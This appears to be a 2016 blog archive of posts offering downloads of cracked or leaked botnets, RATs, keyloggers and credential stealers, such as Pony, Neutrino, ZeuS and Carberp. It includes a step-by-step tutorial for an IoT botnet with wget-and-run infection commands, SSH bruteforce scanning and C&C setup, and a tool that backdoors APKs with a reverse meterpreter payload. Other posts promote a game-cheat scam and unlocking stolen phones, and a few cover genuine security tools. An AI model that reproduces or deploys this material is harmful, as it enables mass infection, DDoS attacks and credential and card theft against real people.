Wednesday, August 10, 2016

Exonet + Source [Botnet C#]

I just wanted to show you a nice Botnet with http control center, called Exonet...
It's very good to learn from as the source is included as well.

Functions:
- Shutdown PC
- Lock PC
- Send Message
- Download & Execute
- DDoS
- Included Builder

There is no backdoor etc. in it, if you don't believe me, don't download it !

Download

Umbra Loader 1.1 [BotNet] Tutorial + Download Link



How to Setup Umbra Loader

Step 1: Unrar all the files and upload all the files in the Panel folder into the webhosting using Filezilla and Chmod all those files to 777

Step 2 : Now Create a sql database in mysql and note those login details

Step 3 : Open the config.php in /Panel/Panel/inc/config.php and put your sql details and panel login username and password there

Step 4 : Open this url in your browser http://yourdomain.com/Panel/Panel/install.php
this will install all the sql tables and delete the install.php you're good to go

Step 5 : login to your panel with your username and password

Download

BitBot HTTP mining botnet Panel + builder cracked by San3eZ


Download

Pony 2.0



What does it steal ?

Quote:
System Info
FAR Manager
Total Commander
WS_FTP
CuteFTP
FlashFXP
FileZilla
FTP Commander
BulletProof FTP
SmartFTP
TurboFTP
FFFTP
CoffeeCup FTP / Sitemapper
CoreFTP
FTP Explorer
Frigate3 FTP
SecureFX
UltraFXP
FTPRush
WebSitePublisher
BitKinex
ExpanDrive
ClassicFTP
Fling
SoftX
Directory Opus
FreeFTP / DirectFTP
LeapFTP
WinSCP
32bit FTP
NetDrive
WebDrive
FTP Control
Opera
WiseFTP
FTP Voyager
Firefox
FireFTP
SeaMonkey
Flock
Mozilla
LeechFTP
Odin Secure FTP Expert
WinFTP
FTP Surfer
FTPGetter
ALFTP
Internet Explorer
Dreamweaver
DeluxeFTP
Google Chrome
Chromium / SRWare Iron
ChromePlus
Bromium (Yandex Chrome)
Nichrome
Comodo Dragon
RockMelt
K-Meleon
Epic
Staff-FTP
AceFTP
Global Downloader
FreshFTP
BlazeFTP
NETFile
GoFTP
3D-FTP
Easy FTP
Xftp
FTP Now
Robo-FTP
LinasFTP
Cyberduck
Putty
Notepad + +
CoffeeCup Visual Site Designer
FTPShell
FTPInfo
NexusFile
FastStone Browser
CoolNovo
WinZip
Yandex.Internet
MyFTP
sherrod FTP
NovaFTP
Windows Mail
Windows Live Mail
Becky!
Pocomail
IncrediMail
The Bat!
Outlook
Thunderbird
FastTrack

Download

ZEMRA BotNet

Download

FireSale v3.0 Botnet{WEBPANEL + SQL + BUILDER + STUB = FULL SOURCE}


Probably one of most popular botnets, made by anatoxis.

What's changed?
I modified source code a little bit, commented out few lines, because in another way you could not create the bot.exe;
Translated few comments in webpanel files, that you could find information faster.

Panel Tutorial:

1).Create a new SQL database using the name of your choice and import "botpanel.sql"
2) Modify the files: "includes\config.php" and "\sc_prefs.php", where my english comments are located.

Compile Builder Tutorial:

1) Compile "Socks5" and "Persistant" and place those files in "Original Stub\Stub\Stub\Resources"
2) Rename "Socks5" to "winsocks" and "Persistant" to "csrse"
3) Compile "Stub" and place it in "Builder\Builder\Resources"
4) Compile the Builder (To Build your bot go to Fertigstellung)

Tested and fully works in Visual Studio 2008


Download
dbh1337

BITCOIN MINING WITH A BOTNET

Download 1
Download 2

Andromeda v2.06 HTTP Botnet

Versatile modular bot. Based on this product, you can build a botnet with a limitless variety of possibilities. The functional bot expanded with the help of plug-ins that can be loaded in the right quantity and at any time.
Not limited by the number of backup support for domains.
The protocol for data exchange between the bot and the admin panel is encrypted using RC4.
Modular. You can convert your botnet to your needs at any time.
The system does not agresiven for installation does not require administrator rights, UAC does not pop up window.
Protect yourself, is not prepared by the user will not be able to remove the bot from the system.
Traverses firewalls without palitsya in the processes used to inject a trusted process.
Do not throw yourself out of any DLL, does not include TLS, it is easy to crypt.
Regardless of the success of the original installation exe is removed.
Works on the line from WinXP to Win7 x64 systems including.
Small size, written entirely in assembly language.

Download

Post: #1Lizard IRC botnet


Download

SimpleJava botnet.

Download

Athena HTTP Builder v.1.0.8 BOTNET

Download

Stresser/Booter VERY Powerful [Botnet]

What I am releasing for you guys today is a web stresser which is not really the technical term because it is using a botnet. So basically it is an API for a botnet and it hits super hard. It hits harder than most web stressers today and it is free!

Download

Blue Botnet Panel + Builder [CLEAN]


HTTP Blue Botnet Source
This is a powerful source for an HTTP Botnet. 50 bots of this botnet can take down most website.

8 method of attack:
-TCP
-UDP
-HTTPROXY
-HTTP
-SYN
-XMLRPC
-MCBOT
-MCBOTALPHA

– Modifiable Proxy & XMLRPC list.
– Login page.
– Advanced Attack Hub.
– Builder.

Download
RattaLeakForums

Athena HTTP Botnet v.1.0.8 + BUILDER

Hi guys,
Today I bring you the new Athena HTTP Botnet cracked and fully functional.
All the instructions about how to set it up are inside the panel.zip, but if you have any doubt about how to set it up just tell me and I'll make a post explaining it.

This botnet has:
- Advanced BotKiller
- DDOS Functions (LOTS)
- Basic Botnet Functions (Download - Install)
- WebChecker
- Many MOAR

Download

Insomnia 2.5 IRC BOTNET Source Code

Download

P2P Botnet Files and Sales

..:: Sinden's LizardSquad <b style="color:#000;background:#ffff66">Botnet</b> <b style="color:#000;background:#66ffff">Tutorial</b> ::..

LIST OF COMMANDS: http://<b style="color:#000;background:#ffcc99">pastebin</b>.com/raw.php?i=kiVSGX2u

• Introduction:
Hello my name is Sinden. I'm currently thinking about quitting from this community so felt obliged to
leak this very nice protocol w/ <b style="color:#000;background:#66ffff">tutorial</b>. Please show your support and appreciation and comment below!

• What You Will Need:
- 2 x Virtual Private Servers
* [At least 4GB RAM] [Centos 6 Or Below Is Recommended!]
- My Custom Files
* [Server.c "http://hastebin.com/raw/ogifodejub"; client.c "http://hastebin.com/raw/evuquwakon"]
- Custom LRAB Scanner
* "https://www.dropbox.com/s/xvvrzx0u3jer6jx/LRAB.zip"
- Dedicated Scanning Server
* [Any Server That Is Capable Of Mass TCP Scanning]

TIP: Good Server Hosts:
!* - Ecatel - http://www.Ecatel.info
!* - VPSDime - http://www.VPSDime.com
!* - HudsonValleyHost.com - http://www.HudsonValleyHost.com
!* - LeaseWeb - http://www.LeaseWeb.com/

• Getting Your Server Ready:
!* - First you will need to install all the dependencies and repositories on your hosting server to run everything as smooth as possible

1. [Centos] - Run this command *NOTE Run this on both your servers!
Command: "wget http://<b style="color:#000;background:#ffcc99">pastebin</b>.com/raw.php?i=Nd1PkEz0 -O update; chmod 777 update; sh update"

!* - Once this has completed you are going to have to configure your <b style="color:#000;background:#ffff66">botnet</b> server. *Note If you're running any other distro edit the update file to apt-get.

2. Run "wget http://hastebin.com/raw/ogifodejub -O server.c; nano server.c" and edit this part
Code:
//Admin-Config
#define MY_MGM_ADMINP "Password"
#define MY_MGM_ADMINU "User"
#define MY_MGM_MATENP "Password"
#define MY_MGM_MATENU "User"
#define MY_MGM_USERP "Password"
#define MY_MGM_USERU "User"
#define MY_MGM_GUESTP "Password"
#define MY_MGM_GUESTU "User"
#define MY_MGM_PORT 6969
This is the login and port settings for the <b style="color:#000;background:#ffff66">botnet</b> protocol. Edit the four clients that look like this "Password" "User".

!* - Once you have edited the file exit and save all changes.

3. Run "gcc -o server server.c -pthread; screen ./server 164 1000" and then once the screen process hold CTRL + A and press D.

!* - That command has disconnected you from the server screen process but will still always be running in the background.

4. Run "yum install nc -y --skip-broken" or "yum install netcat -y --skip-broken"

5. Run "nc localhost 6969"

!* - This should prompt you with a login screen. Use the credentials that you edited in the file.

6. Press CTRL + C to exit and open your secondary server.

!* - This secondary server is your Apache host for your binary's.

7. Run "service httpd start" then "cd /var/www/html"

8. Run "wget http://hastebin.com/raw/digeqiwoya -O arch-wget; sh arch-wget; rm -rf arch-wget"

9. Run "wget http://hastebin.com/raw/evuquwakon -O client.c; nano client.c"

!* - Now this is were you need to pay attention and read carefully.

!* - Find this part in the client.c
Code:
// ___ __ _
// / __\___ _ __ / _(_) __ _
// / / / _ \| '_ \| |_| |/ _` |
// / /__| (_) | | | | _| | (_| |
// \____/\___/|_| |_|_| |_|\__, |
// |___/

unsigned char *commServer[] =
{
"IP:PORT" //Start the server on this port
};


10. Edit the IP to your <b style="color:#000;background:#ffff66">botnet</b> server host and your port to "164"

!* - Find this part of the code on line 990
Code:
if(send(fds[i].fd, "wget http://IP/gb.sh -O /tmp/ gb.sh; sh /tmp/ gb.sh; rm /tmp/ gb.sh\r\n", 79, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }

11. Edit the IP in the wget to the server that's hosting your binaries and change all the file names to what you want your file name to be *NOTE Must end with .sh

!* - Now you need to change the character count and thats this part in that line of code
Code:
79, MSG_NOSIGNAL)

!* - You need to open a code editor e.g Notepad++ or Sublime text that shows character count.

e.g "wget http://IP/gb.sh -O /tmp/ gb.sh; sh /tmp/ gb.sh; rm /tmp/ gb.sh\r\n" the charactor count is 72 *Note Remember "\r\n" you only count the letters not "\".

!* - Once you have edited that file exit and save.

12. Run "wget http://hastebin.com/raw/momuromite -O comp; sh comp client.c"

!* - This will automatically compile your bot to all 12 architectures.

13. On the Apache host server run "wget http://hastebin.com/raw/momuromite -O gb.sh" *NOTE change the name of the file according to what you named it in client.c

14. Run "nano gb.sh" and edit all the parts with the part "IP" to the IP that's hosting your binaries

!* - Check the Apache host IP on your browser like ip/gb.sh to check if the file downlaods

..:: END OF <b style="color:#000;background:#ffff66">BOTNET</b> SETUP... CONTINUE TO LEARN HOW TO ADD BOTS ::..


!* - Login into your scanning server

1. Run "yum install unzip -y --skip-broken"

2. Run "cd /var/opt; mkdir .scan; cd .scan; wget https://www.dropbox.com/s/xvvrzx0u3jer6jx/LRAB.zip; unzip LRAB.zip; cd LRAB"

3. Run "wget http://<b style="color:#000;background:#ffcc99">pastebin</b>.com/raw.php?i=AwEqTNTA -O wget.pl; nano wget.pl"

!* - Find this line
Code:
$channel->exec('wget http://IP/gb.sh -O /tmp/ gb.sh; sh /tmp/ gb.sh; rm /tmp/ gb.sh');

4. Edit the IP and file name to your binary host IP and .sh file name and save and exit.

5. Run "wget http://<b style="color:#000;background:#ffcc99">pastebin</b>.com/raw.php?i=enUdaRrk -O mass"

6. Run "nano mass" and only edit the ranges accept if your interface isn't eth0. *Note You have a complete choice on what ranges you want to scan.

7. Run "screen sh mass" and then hold CTRL+A and press D to de-attach from screen.

!* - Once the scan is done it will automatically start to bruteforce.

*NOTE: To check if the scan is done run "ps -A | grep class" and to check if the bruteforce is still running "ps -A | grep update"

8. To finally add the bots to your net run the finished vuln by typing "perl wget.pl vuln.txt"

Tuturial

Friday, August 5, 2016

{IOS+ANDRIOD} Clash of clans hack | PRIVATE SERVER | FREE! NO JAILBREAK! NO SURVAY

So many fake clash of clans hacks. A buddy of mine showed me this simple trick to get unlimited everything. The trick is called "God-Of-Gems". It's a very simple program. The program will get you a .ipa that you will later import into your device using "I-Funbox".

WORKING AS OF 5/31/15

ENJOY! PLEASE EMAIL: botzone0@gmail.com for setup help!

Tags:
Gems hack
Gold hack
Elixir hack
Anti-ban
User-friendly design
Android/iOs/Social platforms compatible
Jail break require: NO
Root require: NO
100% virus safe
Automatic update check
Many other resources



IOS(IPHONE) link
ANDRIOD LINK

Neutrino HTTP Botnet cracked! BUILDER + PANEL | DDOS | FORMGRAB | LOADER!



Neutrino Bot

- The main functional
* HTTP (S) flood (methods GET \ POST)
* Smart DDoS
* AntiDDOS flood (Emulation js \ cookies)
* Slowloris flood
* Download flood
* TCP flood
* UDP flood


* Loader (exe, dll, vbs, bat ... + can specify parameters for running the file)
* Keylogger (Multilanguage) (support for virtual keyboards (removal of screenshots in the clique size 60x60)) (possibility to monitor the specified window)
* Command shell (remote command execution using shell windows)
* Stealing files by mask (eg bitcoin wallets)
* Launch the browser with one of these links (aka Cheaters views)
* Spoofing Hosts
* Stilling Win keys
* Reproduction (USB \ Archive)
* Purity downloads (number found "neighbors" on the computer)
* Identifying the installed AV (on all Windows except Server)
* Update
* Work through the gasket

- Additional Features
* Anti debugging
* AntiVM
* Detect sandboxes
* Detect all online services automatic analysis
* BotKiller

* Bot protection (protection process \ file \ registry branches)
* Unlimited number of concurrent commands (Some teams have a higher priority than others, and their execution stops others)
* Unlimited number of backup domain
* Quiet operation even under a limited account
* Do not load the CPU

- Functional admin
* Flexible system for creating jobs
* Detailed statistics for bots
* Ability to give commands to each country separately or bot
* Customizable otstuk bots
* Sort bots in Articles IP \ Live \ Country \ OS
* System Bans.

- Weight uncompressed binary file ~ 50kb (PL - C)
- Boat tested on the entire line of Windows, from XP to 8.1 (x32/64)

tags -
Full set (+ bot + admin panel to build an unlimited number of domains) - $ 200
Rebuild (also unlim. Quantity domains) - $ 10
Update (functional) - $ 20
Builder - $ 550
Payment - WM \ BTC \ Perfect

Download

BETABOT 1.8 [NEWEST VERSION] CRACKED!

#1: A seperate option for Cryptocurrency miner proactive defense was added because the "General proactive defense" is still too effective to run successfully on a net that you download other tools to. We recommend you keep "General proactive defense" OFF unless you know what you are doing

#2: The live login grabber has undergone some relatively decent changes. First, some ssl pop3 sessions, and to a more limited degree, ftp as well, are able to be inspected. SSL POP3 grabber does not grab ALL email logins over SSL as each mail client has their own ways of handling cryptography. However Outlook and some others are supported which in turn has drastically boosted the number of relevant logins able to be captured. Valuable logins such as Hotmail/Live and GMail are now more prevelant. Lastly, if the bot is able to determine what domain was used to contact the server, it will be sent instead of the IP address.

#3: Not all tasks report more detailed information. Currently only download/update/botkill tasks are informative

#4. AVKill development has stopped for the time being and some methods have been removed. AVKill will not be nearly as effective for this reason.


Download

Zyklon HTTP Botnet (Panel)

Download

BlackShades 5.1 Crack, Solar Botnet, njRAT and more!

I'm pretty new here and I'd like to share some things I've picked up over time. It is a bundle of some RATs and Solar Botnet. The bundle includes.
Blackshades 5.1 (cracked by MyrSire Tehe)
BlueBanana (Java RAT)
DarkComet5.3.1
Jrat 4.1.9 (Java RAT with ALL plugins Cool)
Jspy (a newer Java RAT)
Loki RAT (PHP rat, no portforwarding)
njRAT (Another great DarkComet alternative
Solar Botnet (the best botnet imo)
Screenshot (Big Picture)


Download

StonedCat Botnet | HTTP Botnet | Better Then Athena/BetaBot

I am re-leaking this. It is only available on a few sites that you either have to pay $700 for access, other sites you need huge reputation, or pay legit to exploit.io. ($1,000 - $3,000)

Point is, I have no idea how to use this. I don't know if it's the source code, much anything. It does have an .apk in there somewhere, and the panel for it. Let me know what you guys discover here.

Feel free to run/download in Sandbox or VM. Decompile, scan, whatever you need. I have no interest infecting members.


Download

Password

Diamond fox botnet 4.2.0.650 FULL LICENSE

Download and the execute (in a memory)
Download and the execute (on disk)
the Open the website of (the Visible)
the Open the website of (the Hidden)
the UDP Flood
the HTTP Flood
the Enable / the Disable the Host Editor is
the Enable / the Disable the PoS Grabber
Spam with the bots (the inbox)
the Bitcoin Wallet Stealer
with Facebook / Twitter spread the Message
of Firefox homepage equipmentCD changer
the Enable / the Disable Keylogger
of Take screenshot The
the Password Grabber (Chorme, of Firefox, of Opera, IExplore, the Safari)
the FTP Grabber (Filezilla)
the Instant the Messaging the Password Grabber
Grab the EMAIL, the SMTP, the POP3 and the IMAP
the Update the bot
the Uninstall

Download

PlasmaHTTP Botnet


Download

Carberp Source code [40K botnet source]

Ok this was originally leaked on TF. It's the most advanced botnet leaked so far. It has a bootkit which in itself is worth 40.000$

This is not for skids! it is full source code meaning you have to compile it yourself. Some parts is also in russian.

Download

Neutrino v3.6 HTTP Botnet | DDoS | Formgrabber | CCGrabber | FTP & Password Grabber

This is leaked Neutrino HTTP 3.6.

----------------------------------------------------------------------
Thread has been google translated from russian
----------------------------------------------------------------------
- Basic functionality
* HTTP (S) flood (methods GET \ POST)
* AntiDDOS flood (Emulation js \ cookies)
* Slowloris flood
* Download flooding
* TCP flood
* UDP flood

* Loader (exe, dll, vbs, bat ... + possibility to specify the parameters for the start of the file)
* Keylogger (Multilanguage) (support for virtual keyboards (removal of screenshots in the clique size 60x60)) (possibility to monitor the specified window)
* Command shell (remote command execution via shell windows)
* Stealing files by mask (eg bitcoin wallets)
* Launch the browser with one of these links (aka Cheaters views)
* Substitution Hosts
* Stilling Win Key
* Reproduction (USB \ Archive)
* Purity downloads (amount found "neighbors" on the computer)
* Identifying the installed AV (on all Windows except Server)
* Update
* Work through the gasket

- Additional functions
* Anti debugging
* AntiVM
* Detect sandboxes
* Detect all online services, automatic analysis
* BotKiller

* Bot protection (protection process \ files \ registry branches)
* Unlimited number of simultaneous commands (Some commands have a higher priority in relation to others and their performance stops, etc.)
* Unlimited number of backup domain
* Quiet operation even under a limited user account
* Do not load the CPU

- Functional admin
* A flexible system of creating jobs
* Detailed statistics on bots
* Ability to issue commands to each country individually or bot
* Customizable bots otstuk
* Sort bots in the articles on IP \ line \ Countries \ OS
* The system bans.

- Weight uncompressed binaries ~ 50kb (PL - C)
- Boat tested on the entire line of Windows, starting with XP to 8.1 (x32 / 64)

Price tags -
Complete kit (Admin + bot + build an unlimited number of domains) - $ 200
Rebild (also Unlim. Number of domains) - $ 10
Update (functional) - $ 20
Builder - $ 550
Payment - WM \ BTC \ Perfect

Binaries licensed, drain - remains without support.

-Contact
PM or n3utrino@kaddafi.me / n3utrino@xmpp.jp


CHANGELOG!

UPDATE to version 2.2
* The algorithm of communication with the server.
* Improved protection scheme admin.
* All merge files \ logs are now displayed in the article ip; filiname; date; size and convenient search.

* Fixed a bug with the file names generated when installs.
* Improved the keylogger logs is now more readable.
* Minor fixes.

Update 2.9.
Boat:
* Reworked all types of attacks, a temporary fixed "attack" when bots from online attacks.
* Reworked the keylogger is almost no waste, it is possible to monitor several windows at once and, if necessary, disable the removal of screenshots.
* Reworked grabber track1 + track2 - Number of waste in the log is nearing zero.
* Many small changes and extensions.
* Added a call to errors with the specified text when it detects virtual ok \ sandboxes, etc.

Admin:
* Changed the scheme of protection within the admin.
* Changed the return teams now Admin works correctly in combination with certain antiddos protection.
* Increased speed of admin, which is especially noticeable on slower servers with a large number of bots.
* At the request of customers added the ability to upload files to the server through the admin panel.

Blog notes and the FAQ is currently unavailable, but comes complete with bot FAQ (RU \ EN).
Customers who wanted a monopoly on the use of certain functions: if the desire remains - knock, all talk.

Attention:
Functional grabber track1 + track2 available as a module in the standard supply does not include the price of the unit is $ 150.
New customers the price before the end of next week the same, but after rising to $ 300 for a standard without functional modules.
For payment are accepted only temporarily BTC, but for old customers who want to upgrade the product available for payment through WebMoney.
[06:51:07] Troy Rad: Update 3.0.
This update is available as a plug-formgrabber -
-Firefox HTTP + SSL
-Internet Explorer HTTP + SSL
-Chrome HTTP

Logs with formgrabbera available in a user-friendly admin statistics.
Price plug - $ 200
For customers with a full version of the bot module cost - $ 50
3.1 Update:
[+] Formgrabber:
- Added Opera.
- Changed filter formgrabbera.

[+] Admin:
- Changed the protection scheme admin.
- Fixed some minor bugs.
I apologize to all our customers for their long absence - because of the problems with most of the iron sortsy / data has been lost, so we had to start over almost from the beginning.
In connection with this update and change 3.2 -


* Almost completely rewritten formgrabber:
- Added grabbing SSL Chrome.
- Added check the status of hooks in the browser.

* Track1 / 2 grabber -
- Removed team at grabbing dump - now grabber is constantly at work.
- Added a convenient conclusion to the admin panel ripped dump type - Bot ip / Track type / Track data / Process name / Date.

* It is also almost completely rewritten botkiller:
- Now the bot kills 98% of bots.
- Changed the scheme of collecting statistics about detected bots.

* Keylogger
- Now you can keep track of all the windows for that instead of the window, specify - "ALLWINDOW"

* From the list of excluded hidden functional browsing.

Update 3.3
Admin:
* Added ability to register multiple users
* Changed the export of logs, are now large volumes exported more bright

Boat:
* Added functionality FTP sniffer work tested with the following customers:
- FileZilla
- WinSCP
- Smart FTP
- FAR
- Cute FTP
- FTP Rush
- Core FTP
- CoffeeFreeFTP
- FlashFXP
- Total Commander

(*) If you require a client is not listed, knock - add.

- New:
* Rewrote the track 1/2 grabber.
* Updated grabbing SSL chromium.
* Check function on Windows 10
* Improved protection scheme admin.
* Updated GeoIP

- Fixed:
* FTP Sniffer
* Fixed a bug with the counters in the admin tasks.

- Removed:
* Hosts changer

Download

ALWAYS USE 21232f297a57a5a743894a0e4a801fc3 AS AUTH KEY!

Pandora DDos Botnet

Download

Leak ZeuS Botnet 2.0.8.9 Source Code!

Download

[ Source VB.net ] FireSale DDOS Botnet


Download

pass: firesale

Athena Botnet C++ Source

Download

Leak Hades Logger | FUD | SMTP/FTP Keylogger | Stealers | Binder | Downloader | Only $12!



Download

Virus Total

LogOS Keylogger - Spreaders - Stealers - Disablers - Killers - Minion Leak



Download

Virus Total

SBOT: Addmefast for Instagram/FaceBook CRACKED!!

SBOT Addmefast for Instagram/FaceBook CRACKED!! Oscar Plz



I found a way to get Sbot Addmefast for free... If you want to see how it works just continue reading Happy Enjoy!!!!


Things you need:
-A brain
-A computer

njRAT v0.7d + Power Crypt FUD Leaked

Included is njRAT v0.7d as well as Power Crypt - cracked by Meth. I recommend using Power Crypt to make your RAT's server FUD.
Link to the rar with both included:

Download

Virus total

Virus scan for power crypt

[Release] [New BOT] POKEMON GO BOT


Download

Thursday, August 4, 2016

How To Factory Unlock Your IPhone Rite from your Home



Recently i came across a website where you can Factory unlock any iPhone permanently rite from you home .I Factory unlocked my iphone 5 locked To AT&T in just 6 hours .


Why to unlock your iPhone what difference will it make ? 

  • After unlocking you can use your iphone with any Gsm carrier in the world . Means you can shift  to any carrier that best suits  your needs .
  • Unlike soft ware or hardware unlocks this wont void your warranty .
  • Its safe and fast you just need to order the unlock , and restore your iphone from itunes  to get it unlocked as simple as that .
  • You can increase the resale value of your iphone .
  • you can even unlock black listed , stolen or insurance claimed phones . they will work normally like a factory unlocked phone after unlocking 
 What models are supported ?

 The big thing is you unlock almost all iPhone models from 40 countries and 500 different carriers around the world . Breakthelock.com supports all base bands and firmware versions . 

unlike software unlocks or jailbreaks , This is a permanent solution you just need to unlock it once and you iphone will stay unlocked forever .You can update IOS, sync with iTunes ,change Sim cards when ever you like with of the fear of ever re locking again

Visit Site

Wireless Network Security Auditing Bash Script: airgeddon





Wireless Network Security Auditing Bash Script


Wireless Network Security Auditing Bash Script: airgeddon

Features

  • Interface mode switcher (Monitor-Managed).
  • DoS over wireless networks with different methods.
  • Assisted Handshake file capture.
  • Cleaning and optimizing Handshake captured files.
  • Offline password decrypt on WPA/WPA2 captured files (dictionary and bruteforce).
  • Compatibility with many Linux distros (see requirements section).
  • Easy targeting and selection in every section.
  • Controlled Exit. Cleaning tasks and temp files. Option to keep monitor mode if desired.
  • Multilanguage support and autodetect OS language feature (see supported languages section).
  • Help hints in every zone/menu for easy use.
  • Autoupdate. Script checks for newer version if possible.

Requirements
  • Bash version 4 or later needed for running airgeddon.
  • Essential:
    iw awk airmon-ng airodump-ng aircrack-ng curl
  • Optional:
    wpaclean crunch aireplay-ng mdk3

Tested and 100% compatible:
  • Kali. 2.0 and 2016.1
  • Wifislax. 4.11.1 and 4.12
  • Backbox. 4.5.1
  • Parrot. 2.2.1
  • Blackarch 2016.01.10
  • Cyborg Hawk 1.1

Under some distros, like Kali Linux script must be called only using bash (not sh). Example bash /path/airgeddon.sh Under Wifislax and others, the script can be called by using either bash or sh. Example sh /path/airgeddon.sh If you call the script using sh and a “Syntax error” appears, use it with bash instead of sh.



Backdoor Android APK: backdoor-apk


 backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.


Usage
root@kali:~/Android/evol-lab/BaiduBrowserRat# ./backdoor-apk.sh BaiduBrowser.apk 
[*] Generating reverse tcp meterpreter payload...done.
[+] Handle the meterpreter connection at: 10.6.9.31:1337
[*] Decompiling original APK file...done.
[*] Decompiling RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Merging permissions of original and payload projects...done.
[*] Recompiling original project with backdoor...done.
[*] Signing recompiled APK...done.
root@kali:~/Android/evol-lab/BaiduBrowserRat#

The recompiled APK will be found in the ‘original/dist’ directory. Install the APK on a compatible Android device, run it, and handle the meterpreter connection at the specified IP and port.

Backdoor Android APK Requirements:

In addition to the obvious tools/utilities  in use the following packages were also required on Kali Linux
apt-get install lib32stdc++6 lib32ncurses5 lib32z1

Example

./backdoor-apk.sh original.apk

Config

modify the following values as necessary
MSFVENOM=msfvenom
LHOST="10.6.9.31"
LPORT="1337"
APKTOOL=apktool2
MY_PATH=`pwd`
ORIG_APK_FILE=$1
RAT_APK_FILE=Rat.apk
LOG_FILE=run.log



Download

Reverse Engineering Android apk Files: Apktool


Reverse Engineering Android apk Files

ApkTool is a tool for reverse engineering 3rd party, closed, binary Android apps. It can decode resources to nearly original form and rebuild them after making some modifications; it makes possible to debug smali code step by step. Also it makes working with app easier because of project-like files structure and automation of some repetitive tasks like building apk, etc.

It is NOT intended for piracy and other non-legal uses. It could be used for localizing, adding some features or support for custom platforms and other GOOD purposes. Just try to be fair with authors of an app, that you use and probably like.

Features

  • Disassembling resources to nearly original form (including resources.arscclasses.dex9.png. and XMLs)
  • Rebuilding decoded resources back to binary APK/JAR
  • Organizing and handling APKs that depend on framework resources
  • Smali Debugging (to be removed in 2.1.0 in favor of IdeaSmali)
  • Helping with repetitive tasks

Requirements

  • Java 7 (JRE 1.7)
  • Basic knowledge of Android SDK, AAPT and smali

How to Build Apktool from source

Apktool is a collection of 1 project, containing 4 sub-projects and a few dependencies.
  • brut.apktool.lib – (Main, all the Library code)
  • brut.apktool.cli – The cli interface of the program
  • brut.j.dir – Utility project
  • brut.j.util – Utility project
  • brut.j.common – Utility project
The main project can be found below

Requirements

  • JDK (1.7)
  • git

Build Steps

We use gradle to build. It’s pretty easy. First clone the repository.
  1. git clone git://github.com/iBotPeaches/Apktool.git
  2. cd Apktool
  3. For steps 3-5 use ./gradlew for unix based systems or gradlew.bat for windows.
  4. [./gradlew][gradlew.bat] build fatJar – Builds Apktool, including final binary.
  5. Optional (You may build a Proguard jar) [./gradlew][gradlew.bat] build fatJar proguard
After 1-2 minutes you should have a jar file at
./brut.apktool/apktool-cli/build/libs/apktool-xxxxx.jar


Download

Live Platform for Android Security Professionals: Android Tamer


Live Platform for Android Security Professionals

      AndroidTamer started out as a VirtualMachine for Android Security Professionals.  This Environment allows people to work on large array of android security related task’s ranging from Malware Analysis, Penetration Testing and Reverse Engineering. AndroidTamer is, at this point the only fully non-commercial non-sponsored entity in Android Security ecosystem.
Android Tamer can work with as little as 512Mb RAM, however if you plan on keeping the eclipse environment running it is suggested to pack at east 1G – 1.5G ram.  Customized to the core, Debian 8 based virtual machine environment is preloaded with tools for Android Pentesting.  AndroidTamer Virtual Machine is a 5.1 GB OVA file ! A lot can be stored in 5GB and you can find all the tools stored inside /Arsenal Folder. Repos have been tested on Debian 8 and they should also work on Kali Linux and Ubuntu 14.04 or 16.04.


Features

  • VirtualBox
  • Android
  • Security
  • Pentesting
  • Malware Analysis
  • Dynamic Analysis
  • Static Analysis
  • Development

Details
  • Debian 8 Base
  • Own repository of tools (repo.androidtamer.com)
  • Signed packages and repository
  • additional Wrappers around useful tools to make life easier
  • everything in path


AndroidTamer Repository in Debian 8

How to configure
$ echo "deb https://repo.androidtamer.com Tamer4 main" | sudo tee  /etc/apt/sources.list.d/repo_androidtamer_com.list
Adding GPG Key
wget -qO - https://androidtamer.com/repo.gpg.key | sudo apt-key add -
Enable HTTPS Debian repositories
sudo apt-get install apt-transport-https
How to install pacakges
$ sudo apt-get update
$ sudo apt-get install <package name>

Default username and password?

username: android
password: tamer
android user has sudo access


Download

Analyze Mobile Phone Metadata: bandicoot


Analyze Mobile Phone Metadata with  bandicoot

     bandicoot (http://bandicoot.mit.edu ) is Python toolbox to analyze mobile phone metadata. It provides a complete, easy-to-use environment for data-scientist to analyze mobile phone metadata. With only a few lines of code, load your datasets, visualize the data, perform analyses, and export the results. It includes an interactive visualization, support for mobile phone recharges, support for Python 3, and clustering algorithms to handle both antenna and GPS locations.
bandicoot provides a complete, easy-to-use environment for data-scientist to analyze mobile phone metadata. With only a few lines of code, load your datasets, visualize the data, perform analyses, and export the results.  There are 1400+ behavioral indicators that are falling into three categories: individual(e.g. number of calls, text response rate), spatial (e.g. radius of gyration, entropy of places), and social network (e.g. clustering coefficient).  bandicoot also has built-in visualization tools. Load a user’s file and visualize his social graph, mobility pattern, and interactions. Check out our IPython notebook for live examples.

Try bandicoot on your phone ?

You can use  Android application to export all your call and text logs into a CSV file. This file can then be imported into the bandicoot toolbox for analysis and visualization.


Dependencies

bandicoot has no dependencies, which allows users to easily compute indicators on a production machine. To run tests and compile the visualization, optional dependencies are needed:

The source code is currently hosted on Github at https://github.com/yvesalexandre/bandicoot. Binary installers for the latest released version are available at the Python package index:
http://pypi.python.org/pypi/bandicoot/
And via easy_install:
easy_install bandicoot
or pip:
pip install bandicoot

AndroBugs Framework


AndroBugs Framework

    AndroBugs Framework is an Android vulnerability analysis system that helps developers or hackers find potential security vulnerabilities in Android applications. No splendid GUI interface, but the most efficient (less than 2 minutes per scan in average) and more accurate.



Features:

  • Find security vulnerabilities in an Android app
  • Check if the code is missing best practices
  • Check dangerous shell commands (e.g. “su”)
  • Collect Information from millions of apps
  • Check the app’s security protection (marked as <Hacker>, designed for app repackaging hacking)

Requirements

  • Python 2.7.x (DO NOT USE Python 3.X)
  • PyMongo library (If you want to use the massive analysis tool)

androBug Framework ScreenShot


Setup Steps and Usage for Windows


Easy to use for Android developers or hackers on Microsoft Windows: (a) No need to install Python 2.7 (b) No need to install any 3rd-party library (c) No need to install AndroBugs Framework
  1. mkdir C:\AndroBugs_Framework
  2. cd C:\AndroBugs_Framework
  3. Unzip the latest Windows version of AndroBugs Framework from Windows releases
  4. Go to Computer->System Properties->Advanced->Environment Variables. Add “C:\AndroBugs_Framework” to the “Path” variable
